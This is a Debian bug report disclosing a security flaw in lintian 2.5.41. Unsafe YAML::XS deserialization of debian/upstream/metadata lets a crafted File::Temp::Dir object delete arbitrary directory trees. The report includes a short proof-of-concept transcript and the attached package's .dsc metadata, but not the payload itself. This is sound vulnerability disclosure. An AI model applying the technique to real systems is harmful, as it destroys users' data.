Package: lintian Version: 2.5.41 Tags: security Lintian uses the YAML::XS module to validate YAML in debian/upstream/metadata.This module is happy to deserialize objects of any existing Perl class. For Lintian, the File::Temp::Dir class can be abused to remove arbitrary directory trees. (There might be other exciting ways to exploit this bug, but I'm too lazy to investigate further.)
I've attached proof-of-concept exploit: $ mkdir /tmp/moo $ ls -d /tmp/moo /tmp/moo $ lintian -C upstream-metadata badyaml_1.dsc $ ls -d /tmp/moo /bin/ls: cannot access '/tmp/moo': No such file or directory -- Jakub Wilk
badyaml_1.tar.xz
Description: application/xz
Format: 3.0 (native) Source: badyaml Binary: badyaml Architecture: all Version: 1 Package-List: badyaml deb unknown unknown arch=all Checksums-Sha1: 9838fde8d6dd00bda20dc32ef430cc912e9f96d9 27928 badyaml_1.tar.xz Checksums-Sha256: d06b616c490cceaffeadaeca19e19348e2cc223aa6e1feb27343932d4f75dbf6 27928 badyaml_1.tar.xz Files: 936d4f8f7134f8b41c4f67b05dd7b3e0 27928 badyaml_1.tar.xz